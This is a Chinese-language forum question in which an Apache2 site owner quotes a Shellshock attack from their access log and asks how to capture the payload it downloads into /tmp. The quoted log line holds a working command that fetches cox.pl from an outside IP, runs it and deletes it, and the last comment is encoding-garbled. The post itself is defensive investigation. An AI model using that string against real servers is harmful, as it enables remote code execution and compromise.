类似的问题已经被问过,但是它们要么对我没有用,要么我无法理解答案。
我运行 Apache2 Web 服务器并托管一些微不足道的个人网站。我正在遭受网络跟踪,或者有人试图黑入我的网站。
Apache2 访问日志显示:
195.154.80.205 - - [05/Nov/2015:09:57:09 +0000] "GET /info.cgi HTTP/1.1" 404 464 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\r\n\r\nXSUCCESS!\";system(\"wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf /tmp/cox.pl*\");'"
这个人(在我的日志中一再尝试)明显想强制我的服务器下载'cox.pl',然后运行'cox.pl',最后删除'cox.pl'。
我真的想知道cox.pl
里面是什么,它可能是Cox-Data-Usage的修改版本,在github上有。
我想要一个脚本,可以不断监视我的/tmp
文件夹,当有新文件添加时,将该文件复制到另一个目录,以便我查看它正在做什么,或者至少试图做什么。
我知道我可以拒绝访问等等,但我想找出这些黑客试图做什么,并看看是否可以收集有关他们的情报。
inotifywait
。我认为您想要做的事情可以通过一个简短的命令行管道来完成。 - Briancox.pl
是有效载荷,如果你受到漏洞的影响,它将运行。 - Neil Slaterbash
дёӯзҡ„дёҖдёӘдёҘйҮҚжјҸжҙһпјҢжІЎжңүдҪҝз”Ёeval
гҖӮ - ikegami